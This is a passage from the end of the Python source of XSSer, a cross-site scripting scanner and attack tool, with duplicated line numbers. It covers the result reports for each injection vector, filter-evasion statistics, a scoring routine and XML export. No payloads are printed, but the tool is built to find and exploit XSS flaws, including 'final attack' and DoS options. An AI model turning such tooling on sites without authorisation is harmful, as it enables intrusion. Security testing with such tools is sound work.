  3144.                                 fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: hashing check" + " \n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status: HASH FOUND!\n\n")
    3145. 

  3145.                             else:
    3146. 

  3146.                                 fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: hashing check" + " \n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status: HASH FOUND!\n\n")
    3147. 

  3147.                             fout.write("="*75 + "\n\n")
    3148. 

  3148.             elif line[1] == "[manual_injection]":
    3149. 

  3149.                 self.manual_found = self.manual_found + 1
    3150. 

  3150.                 if len(self.hash_found) < 11:
    3151. 

  3151.                     if line[4]: # when query string
    3152. 

  3152.                         self.report("[+] Target:", line[6] + " | " + line[4])
    3153. 

  3153.                     else:
    3154. 

  3154.                         self.report("[+] Target:", line[6])
    3155. 

  3155.                     self.report("[+] Vector: [ " + str(line[2]) + " ]")
    3156. 

  3156.                     self.report("[!] Method: MANUAL")
    3157. 

  3157.                     self.report("[*] Hash:", line[3])
    3158. 

  3158.                     self.report("[*] Payload:", line[0])
    3159. 

  3159.                     if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3160. 

  3160.                         self.report("[*] Final Attack:", attack_url)
    3161. 

  3161.                     self.report("[!] Status: XSS FOUND!",  "\n", '-'*50, "\n")
    3162. 

  3162.                 if self.options.fileoutput:
    3163. 

  3163.                     fout.write("="*75)
    3164. 

  3164.                     fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
    3165. 

  3165.                     fout.write("="*75 + "\n\n")
    3166. 

  3166.                     for line in self.hash_found:
    3167. 

  3167.                         if line[4]:
    3168. 

  3168.                             if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3169. 

  3169.                                 fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
    3170. 

  3170.                             else:
    3171. 

  3171.                                 fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Status: XSS FOUND!\n\n")
    3172. 

  3172.                         else:
    3173. 

  3173.                             if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3174. 

  3174.                                 fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
    3175. 

  3175.                             else:
    3176. 

  3176.                                 fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Status: XSS FOUND!\n\n")
    3177. 

  3177.                         fout.write("="*75 + "\n\n")
    3178. 

  3178.             elif line[1] == "[Heuristic test]":
    3179. 

  3179.                 if len(self.hash_found) < 11:
    3180. 

  3180.                     if line[4]: 
    3181. 

  3181.                         self.report("[+] Target:", line[6] + " | " + line[4])
    3182. 

  3182.                     else:
    3183. 

  3183.                         self.report("[+] Target:", line[6])
    3184. 

  3184.                     self.report("[+] Vector: [ " + str(line[3]) + " ]")
    3185. 

  3185.                     self.report("[!] Method:", line[2])
    3186. 

  3186.                     self.report("[*] Payload:", line[5])
    3187. 

  3187.                     self.report("[!] Status: NOT FILTERED!",  "\n", '-'*50, "\n")
    3188. 

  3188.                 if self.options.fileoutput:
    3189. 

  3189.                     fout.write("="*75)
    3190. 

  3190.                     fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
    3191. 

  3191.                     fout.write("="*75 + "\n\n")
    3192. 

  3192.                     for line in self.hash_found:
    3193. 

  3193.                         if line[4]:
    3194. 

  3194.                             fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[3]) + " ]\n\n[!] Method: heuristic" + " \n\n[*] Payload: \n\n " + str(line[5]) + "\n\n[!] Status: NOT FILTERED!\n\n")
    3195. 

  3195.                         else:
    3196. 

  3196.                             fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[3]) + " ]\n\n[!] Method: heuristic" + " \n\n[*] Payload: \n\n " + str(line[5]) + "\n\n[!] Status: NOT FILTERED!\n\n")
    3197. 

  3197.                         fout.write("="*75 + "\n\n")
    3198. 

  3198.             else:
    3199. 

  3199.                 self.auto_found = self.auto_found + 1
    3200. 

  3200.                 if len(self.hash_found) < 11:
    3201. 

  3201.                     if line[4]: # when query string
    3202. 

  3202.                         self.report("[+] Target:", line[6] + " | " + line[4])
    3203. 

  3203.                     else:
    3204. 

  3204.                         self.report("[+] Target:", line[6])
    3205. 

  3205.                     self.report("[+] Vector: [ " + str(line[2]) + " ]")
    3206. 

  3206.                     self.report("[!] Method: URL")
    3207. 

  3207.                     self.report("[*] Hash:", line[3])
    3208. 

  3208.                     self.report("[*] Payload:", line[0])
    3209. 

  3209.                     self.report("[!] Vulnerable:", line[1])
    3210. 

  3210.                     if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3211. 

  3211.                         self.report("[*] Final Attack:", attack_url)
    3212. 

  3212.                     self.report("[!] Status: XSS FOUND!",  "\n", '-'*50, "\n")
    3213. 

  3213.                 if self.options.fileoutput:
    3214. 

  3214.                     fout.write("="*75)
    3215. 

  3215.                     fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
    3216. 

  3216.                     fout.write("="*75 + "\n\n")
    3217. 

  3217.                     for line in self.hash_found:
    3218. 

  3218.                         if line[4]:
    3219. 

  3219.                             if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3220. 

  3220.                                 fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
    3221. 

  3221.                             else:
    3222. 

  3222.                                 fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND!\n\n")
    3223. 

  3223.                         else:
    3224. 

  3224.                             if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3225. 

  3225.                                 fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
    3226. 

  3226.                             else:
    3227. 

  3227.                                 fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND!\n\n")
    3228. 

  3228.                         fout.write("="*75 + "\n\n")
    3229. 

  3229. 

  3230.         if self.options.fileoutput:
    3231. 

  3231.             fout.close()
    3232. 

  3232.         if self.options.fileoutput and not self.options.filexml:
    3233. 

  3233.            self.report("[Info] Generating report: [ XSSreport.raw ]\n")
    3234. 

  3234.            self.report("-"*25+"\n")
    3235. 

  3235.         if self.options.fileoutput and self.options.filexml:
    3236. 

  3236.            self.report("[Info] Generating report: [ XSSreport.raw ] | Exporting results to: [ " + str(self.options.filexml) + " ] \n")
    3237. 

  3237.            self.report("-"*25+"\n")
    3238. 

  3238.         if len(self.hash_found) > 10 and not self.options.fileoutput: # write results fo file when large output (white magic!)
    3239. 

  3239.             if not self.options.filexml: 
    3240. 

  3240.                 self.report("[Info] Aborting large screen output. Generating report: [ XSSreport.raw ]\n")
    3241. 

  3241.                 self.report("-"*25+"\n")
    3242. 

  3242.                 fout = open("XSSreport.raw", "w") # write better than append
    3243. 

  3243.                 fout.write("="*75)
    3244. 

  3244.                 fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
    3245. 

  3245.                 fout.write("="*75 + "\n\n")
    3246. 

  3246.                 for line in self.hash_found:
    3247. 

  3247.                     if line[4]:
    3248. 

  3248.                         if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3249. 

  3249.                             fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
    3250. 

  3250.                         else:
    3251. 

  3251.                             fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND!\n\n")
    3252. 

  3252.                     else:
    3253. 

  3253.                         if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3254. 

  3254.                             fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
    3255. 

  3255.                         else:
    3256. 

  3256.                             fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND!\n\n")
    3257. 

  3257.                     fout.write("="*75 + "\n\n")
    3258. 

  3258.                 fout.close()
    3259. 

  3259.             else:
    3260. 

  3260.                 self.report("[Info] Exporting results to: [ " + str(self.options.filexml) + " ]\n")
    3261. 

  3261.                 self.report("-"*25+"\n")
    3262. 

  3262.         # heuristic always with statistics
    3263. 

  3263.         if self.options.heuristic:
    3264. 

  3264.             heuris_semicolon_total_found = self.heuris_semicolon_found + self.heuris_une_semicolon_found + self.heuris_dec_semicolon_found
    3265. 

  3265.             heuris_backslash_total_found = self.heuris_backslash_found + self.heuris_une_backslash_found + self.heuris_dec_backslash_found
    3266. 

  3266.             heuris_slash_total_found = self.heuris_slash_found + self.heuris_une_slash_found + self.heuris_dec_slash_found
    3267. 

  3267.             heuris_minor_total_found = self.heuris_minor_found + self.heuris_une_minor_found + self.heuris_dec_minor_found
    3268. 

  3268.             heuris_mayor_total_found = self.heuris_mayor_found + self.heuris_une_mayor_found + self.heuris_dec_mayor_found
    3269. 

  3269.             heuris_doublecolon_total_found = self.heuris_doublecolon_found + self.heuris_une_doublecolon_found + self.heuris_dec_doublecolon_found
    3270. 

  3270.             heuris_colon_total_found = self.heuris_colon_found + self.heuris_une_colon_found + self.heuris_dec_colon_found
    3271. 

  3271.             heuris_equal_total_found = self.heuris_equal_found + self.heuris_une_equal_found + self.heuris_dec_equal_found
    3272. 

  3272.             total_heuris_found = heuris_semicolon_total_found + heuris_backslash_total_found + heuris_slash_total_found + heuris_minor_total_found + heuris_mayor_total_found + heuris_doublecolon_total_found + heuris_colon_total_found + heuris_equal_total_found
    3273. 

  3273.             total_heuris_params = total_heuris_found + self.heuris_semicolon_found + self.heuris_backslash_found + self.heuris_slash_found + self.heuris_minor_found + self.heuris_mayor_found + self.heuris_doublecolon_found + self.heuris_colon_found + self.heuris_equal_found
    3274. 

  3274.             total_heuris_notfound = self.heuris_semicolon_notfound + self.heuris_backslash_notfound + self.heuris_slash_notfound + self.heuris_minor_notfound + self.heuris_mayor_notfound + self.heuris_doublecolon_notfound + self.heuris_colon_notfound + self.heuris_equal_notfound
    3275. 

  3275.             if total_heuris_notfound > 0: # not shown when not found
    3276. 

  3276.                 self.options.statistics = True
    3277. 

  3277. 	    # some statistics reports
    3278. 

  3278.         if self.options.statistics:
    3279. 

  3279.             # heuristic test results
    3280. 

  3280.             if self.options.heuristic:
    3281. 

  3281.                 self.report("\n"+'='*75)
    3282. 

  3282.                 self.report("[+] Heuristics:")
    3283. 

  3283.                 self.report('='*75)
    3284. 

  3284.                 test_time = datetime.datetime.now() - self.time
    3285. 

  3285.                 self.report("\n" + '-'*50)
    3286. 

  3286.                 self.report("Test Time Duration: ", test_time)
    3287. 

  3287.                 self.report('-'*50  )
    3288. 

  3288.                 total_connections = total_heuris_found + total_heuris_notfound
    3289. 

  3289.                 self.report("Total fuzzed:", total_connections)
    3290. 

  3290.                 self.report('-'*75)
    3291. 

  3291.                 self.report('  ', "  <FILTERED!>", "  <NOT FILTERED!>", " =" , "  ASCII", "+", "UNE/HEX", "+", "DEC")
    3292. 

  3292.                 # semicolon results
    3293. 

  3293.                 self.report('; ',   "      ", self.heuris_semicolon_notfound, "             ", 
    3294. 

  3294.                             heuris_semicolon_total_found, "             ",
    3295. 

  3295.                             self.heuris_semicolon_found, "      ",
    3296. 

  3296.                             self.heuris_une_semicolon_found, "     ",
    3297. 

  3297.                             self.heuris_dec_semicolon_found)
    3298. 

  3298.                 # backslash results
    3299. 

  3299.                 self.report('\\ ',  "      ", self.heuris_backslash_notfound, "             ", 
    3300. 

  3300.                             heuris_backslash_total_found, "             ",
    3301. 

  3301.                             self.heuris_backslash_found, "      ",
    3302. 

  3302.                             self.heuris_une_backslash_found, "     ",
    3303. 

  3303.                             self.heuris_dec_backslash_found)
    3304. 

  3304.                 # slash results
    3305. 

  3305.                 self.report("/ ",   "      ", self.heuris_slash_notfound, "             ",
    3306. 

  3306.                             heuris_slash_total_found, "             ",
    3307. 

  3307.                             self.heuris_slash_found, "      ",
    3308. 

  3308.                             self.heuris_une_slash_found, "     ",
    3309. 

  3309.                             self.heuris_dec_slash_found)
    3310. 

  3310.                 # minor results
    3311. 

  3311.                 self.report("< ",   "      ", self.heuris_minor_notfound, "             ",
    3312. 

  3312.                             heuris_minor_total_found, "             ",
    3313. 

  3313.                             self.heuris_minor_found, "      ",
    3314. 

  3314.                             self.heuris_une_minor_found, "     ",
    3315. 

  3315.                             self.heuris_dec_minor_found)
    3316. 

  3316.                 # mayor results
    3317. 

  3317.                 self.report("> ",   "      ", self.heuris_mayor_notfound, "             ",
    3318. 

  3318.                             heuris_mayor_total_found, "             ",
    3319. 

  3319.                             self.heuris_mayor_found, "      ",
    3320. 

  3320.                             self.heuris_une_mayor_found, "     ",
    3321. 

  3321.                             self.heuris_dec_mayor_found)
    3322. 

  3322.                 # doublecolon results
    3323. 

  3323.                 self.report('" ',   "      ", self.heuris_doublecolon_notfound, "             ", 
    3324. 

  3324.                             heuris_doublecolon_total_found, "             ",
    3325. 

  3325.                             self.heuris_doublecolon_found, "      ",
    3326. 

  3326.                             self.heuris_une_doublecolon_found, "     ",
    3327. 

  3327.                             self.heuris_dec_doublecolon_found)
    3328. 

  3328.                 # colon results
    3329. 

  3329.                 self.report("' ",   "      ", self.heuris_colon_notfound, "             ",
    3330. 

  3330.                             heuris_colon_total_found, "             ",
    3331. 

  3331.                             self.heuris_colon_found, "      ",
    3332. 

  3332.                             self.heuris_une_colon_found, "     ",
    3333. 

  3333.                             self.heuris_dec_colon_found)
    3334. 

  3334.                 # equal results
    3335. 

  3335.                 self.report("= ",   "      ", self.heuris_equal_notfound, "             ",
    3336. 

  3336.                             heuris_equal_total_found, "             ",
    3337. 

  3337.                             self.heuris_equal_found, "      ",
    3338. 

  3338.                             self.heuris_une_equal_found, "     ",
    3339. 

  3339.                             self.heuris_dec_equal_found)
    3340. 

  3340.                 self.report('-'*75)
    3341. 

  3341.                 try:
    3342. 

  3342.                     _accur = total_heuris_found * 100 / total_heuris_params
    3343. 

  3343.                 except ZeroDivisionError:
    3344. 

  3344.                     _accur = 0
    3345. 

  3345.                 self.report('Target(s) Filtering Accur: %s %%' % _accur)
    3346. 

  3346.                 self.report('-'*75)
    3347. 

  3347.             # statistics block
    3348. 

  3348.             if len(self.hash_found) + len(self.hash_notfound) == 0:
    3349. 

  3349.                 pass
    3350. 

  3350.             if self.options.heuristic:
    3351. 

  3351.                 pass
    3352. 

  3352.             else:
    3353. 

  3353.                 self.report('='*75)
    3354. 

  3354.                 self.report("[+] Statistics:")
    3355. 

  3355.                 self.report('='*75)
    3356. 

  3356.                 test_time = datetime.datetime.now() - self.time
    3357. 

  3357.                 self.report("\n" + '-'*50)
    3358. 

  3358.                 self.report("Test Time Duration: ", test_time)
    3359. 

  3359.                 self.report('-'*50  )
    3360. 

  3360.                 total_connections = self.success_connection + self.not_connection + self.forwarded_connection + self.other_connection
    3361. 

  3361.                 self.report("Total Connections:", total_connections)
    3362. 

  3362.                 self.report('-'*25)
    3363. 

  3363.                 self.report("200-OK:" , self.success_connection , "|",  "404:" ,
    3364. 

  3364.                             self.not_connection , "|" , "503:" ,
    3365. 

  3365.                             self.forwarded_connection , "|" , "Others:",
    3366. 

  3366.                             self.other_connection)
    3367. 

  3367.                 try:
    3368. 

  3368.                     _accur = self.success_connection * 100 / total_connections
    3369. 

  3369.                 except ZeroDivisionError:
    3370. 

  3370.                     _accur = 0
    3371. 

  3371.                 self.report("Connec: %s %%" % _accur)
    3372. 

  3372.                 self.report('-'*50)
    3373. 

  3373.                 total_payloads = self.check_positives + self.manual_injection + self.auto_injection + self.dcp_injection + self.dom_injection + self.xsa_injection + self.xsr_injection + self.coo_injection 
    3374. 

  3374.                 self.report("Total Payloads:", total_payloads)
    3375. 

  3375.                 self.report('-'*25)
    3376. 

  3376.                 self.report("Checker:", self.check_positives,  "|", "Manual:",
    3377. 

  3377.                             self.manual_injection, "|" , "Auto:" ,
    3378. 

  3378.                             self.auto_injection ,"|", "DCP:",
    3379. 

  3379.                             self.dcp_injection, "|", "DOM:", self.dom_injection,
    3380. 

  3380.                             "|", "Induced:", self.httpsr_injection, "|" , "XSR:",
    3381. 

  3381.                             self.xsr_injection, "|", "XSA:",
    3382. 

  3382.                             self.xsa_injection , "|", "COO:",
    3383. 

  3383.                             self.coo_injection)
    3384. 

  3384.                 self.report('-'*50)
    3385. 

  3385.                 self.report("Total Injections:" , 
    3386. 

  3386.                             len(self.hash_notfound) + len(self.hash_found))
    3387. 

  3387.                 self.report('-'*25)
    3388. 

  3388.                 self.report("Failed:" , len(self.hash_notfound), "|",
    3389. 

  3389.                             "Successful:" , len(self.hash_found))
    3390. 

  3390.                 try:
    3391. 

  3391.                     _accur = len(self.hash_found) * 100 / total_injections
    3392. 

  3392.                 except ZeroDivisionError:
    3393. 

  3393.                     _accur = 0
    3394. 

  3394.                 self.report("Accur : %s %%" % _accur)
    3395. 

  3395.                 self.report("\n" + '='*50)
    3396. 

  3396.                 total_discovered = self.false_positives + self.manual_found + self.auto_found + self.dcp_found + self.dom_found + self.xsr_found + self.xsa_found + self.coo_found
    3397. 

  3397.                 self.report("\n" + '-'*50)
    3398. 

  3398.                 self.report("Total XSS Discovered:", total_discovered)
    3399. 

  3399.                 self.report('-'*50)
    3400. 

  3400.                 self.report("Checker:", self.false_positives, "|",
    3401. 

  3401.                             "Manual:",self.manual_found, "|", "Auto:",
    3402. 

  3402.                             self.auto_found, "|", "DCP:", self.dcp_found,
    3403. 

  3403.                             "|", "DOM:", self.dom_found, "|", "Induced:",
    3404. 

  3404.                             self.httpsr_found, "|" , "XSR:", self.xsr_found,
    3405. 

  3405.                             "|", "XSA:", self.xsa_found, "|", "COO:",
    3406. 

  3406.                             self.coo_found)
    3407. 

  3407.                 self.report('-'*50)
    3408. 

  3408.                 self.report("False positives:", self.false_positives, "|",
    3409. 

  3409.                             "Vulnerables:",
    3410. 

  3410.                             total_discovered - self.false_positives)
    3411. 

  3411.                 self.report('-'*25)
    3412. 

  3412. 	        # efficiency ranking:
    3413. 

  3413. 	        # algor= vulnerables + false positives - failed * extras
    3414. 

  3414.                 mana = 0
    3415. 

  3415.                 h_found = 0
    3416. 

  3416.                 for h in self.hash_found:
    3417. 

  3417.                     h_found = h_found + 1
    3418. 

  3418.                 if h_found > 3:
    3419. 

  3419.                     mana = mana + 4500
    3420. 

  3420.                 if h_found == 1:
    3421. 

  3421.                     mana = mana + 500
    3422. 

  3422.                 if self.options.reversecheck:
    3423. 

  3423.                     mana = mana + 200
    3424. 

  3424.                 if total_payloads > 100:
    3425. 

  3425.                     mana = mana + 150
    3426. 

  3426.                 if not self.options.xsser_gtk:
    3427. 

  3427.                     mana = mana + 25
    3428. 

  3428.                 if self.options.discode:
    3429. 

  3429.                     mana = mana + 100
    3430. 

  3430.                 if self.options.proxy:
    3431. 

  3431.                     mana = mana + 100
    3432. 

  3432.                 if self.options.threads > 9:
    3433. 

  3433.                     mana = mana + 100
    3434. 

  3434.                 if self.options.heuristic:
    3435. 

  3435.                     mana = mana + 100
    3436. 

  3436.                 if self.options.finalpayload or self.options.finalremote:
    3437. 

  3437.                     mana = mana + 100
    3438. 

  3438.                 if self.options.script:
    3439. 

  3439.                     mana = mana + 100
    3440. 

  3440.                 if self.options.Cem or self.options.Doo:
    3441. 

  3441.                     mana = mana + 75
    3442. 

  3442.                 if self.options.heuristic:
    3443. 

  3443.                     mana = mana + 50
    3444. 

  3444.                 if self.options.script and not self.options.fuzz:
    3445. 

  3445.                     mana = mana + 25
    3446. 

  3446.                 if self.options.followred and self.options.fli:
    3447. 

  3447.                     mana = mana + 25
    3448. 

  3448.                 if self.options.wizard:
    3449. 

  3449.                     mana = mana + 25
    3450. 

  3450.                 if self.options.dcp:
    3451. 

  3451.                     mana = mana + 25
    3452. 

  3452.                 if self.options.hash:
    3453. 

  3453.                     mana = mana + 10
    3454. 

  3454.                 mana = (len(self.hash_found) * mana) + mana
    3455. 

  3455.                 # enjoy it :)
    3456. 

  3456.                 self.report("Mana:", mana)
    3457. 

  3457.                 self.report("")
    3458. 

  3458.         c = Curl()
    3459. 

  3459.         if not len(self.hash_found) and self.hash_notfound:
    3460. 

  3460.             if self.options.hash:
    3461. 

  3461.                 if self.options.statistics:
    3462. 

  3462.                     self.report('='*75 + '\n')
    3463. 

  3463.                 self.report("[Info] Target isn't replying to the input [ --hash ] sent!\n")
    3464. 

  3464.             else:
    3465. 

  3465.                 if self.options.target or self.options.heuristic:
    3466. 

  3466.                     self.report("")
    3467. 

  3467.                 if self.options.heuristic:
    3468. 

  3468.                     pass
    3469. 

  3469.                 else:
    3470. 

  3470.                     if self.options.statistics:
    3471. 

  3471.                         self.report('='*75 + '\n')
    3472. 

  3472.             if self.options.fileoutput:
    3473. 

  3473.                 fout = open("XSSreport.raw", "w") # write better than append
    3474. 

  3474.                 fout.write("="*75)
    3475. 

  3475.                 fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
    3476. 

  3476.                 fout.write("="*75 + "\n\n")
    3477. 

  3477.                 for h in self.hash_notfound:
    3478. 

  3478.                     if h[2] == 'heuristic':
    3479. 

  3479.                         if not h[4]:
    3480. 

  3480.                             fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[3]) + "\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n" + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n")
    3481. 

  3481.                         else:
    3482. 

  3482.                             fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n")
    3483. 

  3483.                     elif h[2] == 'hashing check':
    3484. 

  3484.                         if not h[4]:
    3485. 

  3485.                             fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[3]) + "\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n" + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n")
    3486. 

  3486.                         else:
    3487. 

  3487.                             fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n")
    3488. 

  3488.                     else:
    3489. 

  3489.                         if h[4]:
    3490. 

  3490.                             if h[2] == "XSA":
    3491. 

  3491.                                fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
    3492. 

  3492.                             elif h[2] == "XSR":
    3493. 

  3493.                                fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
    3494. 

  3494.                             elif h[2] == "COO":
    3495. 

  3495.                                fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
    3496. 

  3496.                             else:
    3497. 

  3497.                                 fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + h[1] + "\n\n[!] Status: XSS FAILED!\n\n")
    3498. 

  3498.                         else:
    3499. 

  3499.                             if h[2] == "XSA":
    3500. 

  3500.                                fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
    3501. 

  3501.                             elif h[2] == "XSR":
    3502. 

  3502.                                fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
    3503. 

  3503.                             elif h[2] == "COO":
    3504. 

  3504.                                fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
    3505. 

  3505.                             else:
    3506. 

  3506.                                 fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + h[1] + "\n\n[!] Status: XSS FAILED!\n\n")
    3507. 

  3507.                     fout.write("="*75 + "\n\n")
    3508. 

  3508.                 fout.close()
    3509. 

  3509.         else:
    3510. 

  3510.             # some exits and info for some bad situations:
    3511. 

  3511.             if len(self.hash_found) + len(self.hash_notfound) == 0 and not Exception:
    3512. 

  3512.                 self.report("\n[Error] XSSer cannot send any data... maybe -something- is blocking connection(s)!?\n")
    3513. 

  3513.             if len(self.hash_found) + len(self.hash_notfound) == 0 and self.options.crawling:
    3514. 

  3514.                 if self.options.xsser_gtk:
    3515. 

  3515.                     self.report('='*75)
    3516. 

  3516.                 self.report("\n[Error] Not any feedback from crawler... Aborting! :(\n")
    3517. 

  3517.                 self.report('='*75 + '\n')
    3518. 

  3518. 

  3519.         # print results to xml file
    3520. 

  3520.         if self.options.filexml:
    3521. 

  3521.             xml_report_results = xml_reporting(self)
    3522. 

  3522.             try:
    3523. 

  3523.                 xml_report_results.print_xml_results(self.options.filexml)
    3524. 

  3524.             except:
    3525. 

  3525.                 return
    3526. 

  3526. 

  3527. if __name__ == "__main__":
    3528. 

  3528.     app = xsser()
    3529. 

  3529.     options = app.create_options()
    3530. 

  3530.     if options:
    3531. 

  3531.         app.set_options(options)
    3532. 

  3532.         app.run()
    3533. 

